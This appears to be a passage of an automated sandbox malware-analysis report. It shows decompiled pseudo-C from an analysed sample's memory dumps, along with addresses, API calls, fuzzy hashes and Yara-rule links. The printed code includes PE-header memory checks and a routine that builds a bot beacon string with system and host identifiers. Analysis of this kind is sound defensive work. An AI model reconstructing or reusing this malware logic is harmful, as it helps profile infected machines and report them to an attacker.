								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x50a330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x50a378 = 1;
										__eflags =  *0x50a378;
										if( *0x50a378 != 0) {
											goto L60;
										}
										_t84 =  *0x50a330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x50a378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x50a330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x50a338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x50a334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x50a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x50a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x50a378 = 1;
							__eflags =  *0x50a378;
							if( *0x50a378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x50a338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x50a338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x50a378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x50a338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x50a330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x50a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x50a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x005081d7
0x005081da
0x005081e0
0x005081fe
0x00000000
0x005081fe
0x005081e8
0x005081f1
0x005081f7
0x00508206
0x00508209
0x0050820c
0x00508216
0x00508216
0x00508218
0x0050821b
0x0050821d
0x0050821d
0x0050821f
0x00508222
0x00000000
0x00000000
0x00508224
0x00508226
0x0050828c
0x0050828c
0x005083ea
0x00000000
0x005083ea
0x00508228
0x00508228
0x0050822c
0x0050822e
0x0050822e
0x0050822e
0x0050822e
0x00508231
0x00508232
0x00508235
0x00508235
0x00508239
0x0050823d
0x0050824b
0x0050824b
0x00508253
0x00508259
0x0050825b
0x0050825d
0x0050826d
0x0050827a
0x0050827e
0x00508283
0x00508285
0x00508303
0x00508303
0x00508287
0x00508287
0x00508287
0x00508305
0x00508307
0x005083e8
0x005083e8
0x00000000
0x0050830d
0x0050830d
0x00508314
0x00000000
0x00000000
0x0050831a
0x0050831e
0x0050837a
0x0050837c
0x00508384
0x00508386
0x00508388
0x00000000
0x00000000
0x0050838a
0x00508390
0x00508392
0x00508394
0x005083a9
0x005083a9
0x005083ab
0x005083da
0x005083e1
0x00000000
0x005083e1
0x005083af
0x005083b0
0x005083b2
0x005083b4
0x005083b4
0x005083b6
0x005083b8
0x005083ba
0x005083ce
0x005083ce
0x005083d1
0x005083d3
0x005083d3
0x005083d4
0x005083d4
0x00000000
0x005083bc
0x005083bc
0x005083bc
0x005083c5
0x005083c6
0x005083c8
0x005083ca
0x005083ca
0x00000000
0x005083bc
0x005083ba
0x00508396
0x0050839d
0x0050839d
0x0050839f
0x00000000
0x00000000
0x005083a1
0x005083a2
0x005083a5
0x005083a7
0x00000000
0x00000000
0x00000000
0x005083a7
0x00000000
0x0050839d
0x00508320
0x00508323
0x00508328
0x00000000
0x00000000
0x00508331
0x00508333
0x00508339
0x00000000
0x00000000
0x0050833f
0x00508345
0x00000000
0x00000000
0x0050834b
0x0050834d
0x00508356
0x0050835a
0x00000000
0x00000000
0x00508360
0x00508363
0x00508365
0x00000000
0x00000000
0x0050836c
0x0050836e
0x00000000
0x00000000
0x00508370
0x00508374
0x00000000
0x00000000
0x00000000
0x00508374
0x00000000
0x00000000
0x00000000
0x0050825f
0x0050825f
0x0050825f
0x00508266
0x00000000
0x00000000
0x00508268
0x00508269
0x0050826b
0x00000000
0x00000000
0x00000000
0x0050826b
0x00508293
0x00508295
0x00000000
0x00000000
0x005082a5
0x005082a7
0x005082a9
0x00000000
0x00000000
0x005082af
0x005082b6
0x005082e2
0x005082e2
0x005082e4
0x005082e6
0x005082fa
0x005082fc
0x00000000
0x00000000
0x00000000
0x00000000
0x005082e8
0x005082e8
0x005082e8
0x005082f1
0x005082f2
0x005082f4
0x005082f6
0x005082f6
0x00000000
0x005082e8
0x005082b8
0x005082b8
0x005082bb
0x005082bd
0x005082cf
0x005082cf
0x005082d2
0x005082d4
0x005082d4
0x005082d5
0x005082d5
0x005082db
0x005082db
0x00000000
0x00000000
0x00000000
0x00000000
0x005082bf
0x005082bf
0x005082bf
0x005082c6
0x00000000
0x00000000
0x005082c8
0x005082c8
0x005082c9
0x00000000
0x00000000
0x00000000
0x005082c9
0x005082cb
0x005082cd
0x005082e0
0x00000000
0x00000000
0x00000000
0x005082e0
0x00000000
0x005082cd
0x0050823f
0x00508242
0x00508245
0x00000000
0x00000000
0x00508247
0x00508249
0x00000000
0x00000000
0x00000000
0x00508249
0x0050820e
0x00508210
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0050827E

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 17680fe9cebdb0ce39bf6955e02cd361ca3e7cbdd632278c6bcbc9edfd8fc186
Instruction ID: bf7bf0866ec6934304f7e6250555f967e9ac2409c952cd172382fca03c08455b
Opcode Fuzzy Hash: 17680fe9cebdb0ce39bf6955e02cd361ca3e7cbdd632278c6bcbc9edfd8fc186
Instruction Fuzzy Hash: 2B61B135600B13CBDB29CE28C994EBD3BA5FBD5714B248939E896C72D1EF31DC428A44

Uniqueness

Uniqueness Score: -1.00%

Function 6C54AAC0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6C54AAAC,00000001,?,6C5563F1,6C55648F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6C54AAEE

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 1516d85c3c0ea9b9e439cd59ea372096b2d334b2329029d4ef715e2e60968774
Instruction ID: 3fdabb59402d57fcc46de4f459a7d5cf9e616cad950ede132e415ae0bdecd7e9
Opcode Fuzzy Hash: 1516d85c3c0ea9b9e439cd59ea372096b2d334b2329029d4ef715e2e60968774
Instruction Fuzzy Hash: C6E08C31210248ABDF01CFE9DC01F693BF6FB49710F018020F50C4A8B0C372A5609F84

Uniqueness

Uniqueness Score: -1.00%

Function 6C54AAFD, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,20001004,?,6C54FC05,?,6C54FC05,?,20001004,?,00000002,?,00000004,?,00000000), ref: 6C54AB24

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 40c96a25794284a97d5b1cd06cd651dd1bbb5aabfff4d64059a047b3aadd6f37
Instruction ID: 9feb4640eedfa4323c29faa26393e4248b273554dd3350b9c0ccc555aaacd82c
Opcode Fuzzy Hash: 40c96a25794284a97d5b1cd06cd651dd1bbb5aabfff4d64059a047b3aadd6f37
Instruction Fuzzy Hash: 2BD05E3200010DFFDF019FD5EC05CBA3BB9FB49329B018415F91846920D732A960DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6C54B524, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(6C54563F,6C55B7B8,00000008,6C545815,?,00000001,?,6C55B7D8,0000000C,6C5457B4,?,00000001,?), ref: 6C54B524

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 3e7c44110bcbac96200bddbb0aa525e93c194519115f249aa5f3559cc17fec9b
Instruction ID: 53a55b3bc20f4dc184ffe1edd0eebf926630cc040e56198389fa7612729001ef
Opcode Fuzzy Hash: 3e7c44110bcbac96200bddbb0aa525e93c194519115f249aa5f3559cc17fec9b
Instruction Fuzzy Hash: 15B012B0306182474F084B3D94243393AF8570D202306403D7003C19A0DF30C4109F00

Uniqueness

Uniqueness Score: -1.00%

Function 00507FA8, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00507FA8(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00508113(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E005081CD(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E005080B8(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00508113(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E005081AF(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00507fac
0x00507fad
0x00507fae
0x00507fb1
0x00507fb3
0x00507fb6
0x00507fb7
0x00507fb9
0x00507fba
0x00507fbb
0x00507fbe
0x00507fc8
0x00508079
0x00508080
0x00508089
0x00507fce
0x00507fce
0x00507fd4
0x00507fda
0x00507fdd
0x00507fe0
0x00507fe4
0x00507fe9
0x00507fee
0x0050806e
0x00000000
0x00507ff0
0x00507ff0
0x00507ffc
0x00507ffe
0x00508059
0x00508059
0x0050805f
0x00000000
0x00508000
0x0050800f
0x00508011
0x00508012
0x00508013
0x00508016
0x00508016
0x00508018
0x00000000
0x0050801a
0x0050801a
0x00508064
0x0050801c
0x0050801c
0x00508020
0x00508028
0x0050802d
0x00508032
0x0050803e
0x00508046
0x0050804d
0x00508053
0x00508057
0x00000000
0x00508057
0x0050801a
0x00508018
0x00000000
0x00507ffe
0x00508072
0x00508072
0x00508072
0x00507fee
0x0050808e
0x00508095

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: fe5bf50eadc74d0cfce9a8daa3076f2a7b34d37d02fac671a6c000b5adc37ace
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: B421A472900205DFCB10EF69C899D7BBFA5BF44350B0985A9E9558B285DB30F919C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6C502264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6C502264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6C5023CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6C502485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6C502370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6C5023CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6C502467(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6c502268
0x6c502269
0x6c50226a
0x6c50226d
0x6c50226f
0x6c502272
0x6c502273
0x6c502275
0x6c502276
0x6c502277
0x6c50227a
0x6c502284
0x6c502335
0x6c50233c
0x6c502345
0x6c50228a
0x6c50228a
0x6c502290
0x6c502296
0x6c502299
0x6c50229c
0x6c5022a0
0x6c5022a5
0x6c5022aa
0x6c50232a
0x00000000
0x6c5022ac
0x6c5022ac
0x6c5022b8
0x6c5022ba
0x6c502315
0x6c502315
0x6c50231b
0x00000000
0x6c5022bc
0x6c5022cb
0x6c5022cd
0x6c5022ce
0x6c5022cf
0x6c5022d2
0x6c5022d2
0x6c5022d4
0x00000000
0x6c5022d6
0x6c5022d6
0x6c502320
0x6c5022d8
0x6c5022d8
0x6c5022dc
0x6c5022e4
0x6c5022e9
0x6c5022ee
0x6c5022fa
0x6c502302
0x6c502309
0x6c50230f
0x6c502313
0x00000000
0x6c502313
0x6c5022d6
0x6c5022d4
0x00000000
0x6c5022ba
0x6c50232e
0x6c50232e
0x6c50232e
0x6c5022aa
0x6c50234a
0x6c502351

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 67f9a527bcbd9bd7838450ab535c4d69cd265aaf30736ff0e37b133990a5a767
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 0F21D672A00204DBCB14DF68CC849EBB7A5FF48314B45816CD815CB645D730F919CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6C55ED24, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.918341548.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 837a71192451742734e60768025363ab4be2b9782fd24d286a3c14467c825df2
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 0B1181733405009FD754CF59DC81EA2B3AAFB89230765806AED04CB715E67AEC52C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6C50FC64, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5dd1226c29ed36b8904af4bb7fed6d012e7b5b11d48ad500e92d23b6411df2f
Instruction ID: 280b0634377a43bbdb418f7924208f587cd9d635a8d31753cbe46cd8f423ffac
Opcode Fuzzy Hash: c5dd1226c29ed36b8904af4bb7fed6d012e7b5b11d48ad500e92d23b6411df2f
Instruction Fuzzy Hash: C7014C3156C78ACFC30AEF38C89C9917BA0EB52295B9845DFC894CF5B2D9204149C752

Uniqueness

Uniqueness Score: -1.00%

Function 6C55F11D, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.918341548.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: a9efebb213098292dc86e4c97e689aea8d9f1fa3594f91c43f1413b3f45fcff5
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 4C01F1373052019FDB04CB2DED84D6ABBE8EBC6374BA5827FC44683E19D220E841CA20

Uniqueness

Uniqueness Score: -1.00%

Function 00506124, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00506124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x50a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x50a018; // 0x5ffc1f8b
					asm("bswap eax");
					_t32 =  *0x50a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x50a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x50a00c; // 0x67522d90
					asm("bswap eax");
					_t35 =  *0x50a2d0; // 0x2add5a8
					_t2 = _t35 + 0x50b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0x50a02c,  *0x50a004, _t110);
					_t38 = E0050271A();
					_t39 =  *0x50a2d0; // 0x2add5a8
					_t3 = _t39 + 0x50b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x50a2d0; // 0x2add5a8
						_t7 = _t92 + 0x50b66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00502956(_t99);
					_t44 =  *0x50a2d0; // 0x2add5a8
					_t9 = _t44 + 0x50b38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x50a2d0; // 0x2add5a8
					_t11 = _t48 + 0x50b33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x50a328; // 0x2fe95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x50a2d0; // 0x2add5a8
						_t13 = _t88 + 0x50b685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x50a37c; // 0x2fe9630
					_a28 = E00505741(0x50a00a, _t105 + 4);
					_t55 =  *0x50a318; // 0x2fe95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x50a2d0; // 0x2add5a8
						_t16 = _t84 + 0x50b8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x50a314; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x50a2d0; // 0x2add5a8
						_t18 = _t81 + 0x50b8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x50a290, _t107, 0x800);
						if(_t98 != _t107) {
							E00501A51(GetTickCount());
							_t62 =  *0x50a37c; // 0x2fe9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x50a37c; // 0x2fe9630
							__imp__(_t66 + 0x40);
							_t68 =  *0x50a37c; // 0x2fe9630
							_t115 = E00505AE3(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x5092cc);
								_push(_t115);
								_t108 = E00502829();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00503B46(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00502813();
									}
									HeapFree( *0x50a290, 0, _v24);
								}
								HeapFree( *0x50a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x50a290, _t107, _t98);
						}
						HeapFree( *0x50a290, _t107, _a20);
					}
					HeapFree( *0x50a290, _t107, _t117);
				}
				return _v16;
			}

0x00506124
0x00506138
0x0050613a
0x00506148
0x0050614c
0x00506154
0x0050615c
0x0050615c
0x0050615e
0x0050616a
0x00506179
0x0050617e
0x00506181
0x00506186
0x00506189
0x0050618e
0x00506191
0x0050619d
0x005061aa
0x005061ac
0x005061b2
0x005061b7
0x005061c2
0x005061c4
0x005061c7
0x005061cd
0x005061cf
0x005061d8
0x005061e3
0x005061e5
0x005061e8
0x005061e8
0x005061ea
0x005061f1
0x005061f6
0x00506203
0x00506205
0x0050620a
0x00506218
0x0050621a
0x0050621f
0x00506224
0x00506227
0x0050622c
0x00506237
0x00506239
0x0050623c
0x0050623c
0x0050623e
0x00506251
0x00506255
0x0050625a
0x0050625e
0x00506261
0x00506266
0x00506271
0x00506273
0x00506276
0x00506276
0x00506278
0x0050627f
0x00506282
0x00506287
0x00506291
0x00506293
0x0050629a
0x005062b2
0x005062b6
0x005062c2
0x005062c7
0x005062d0
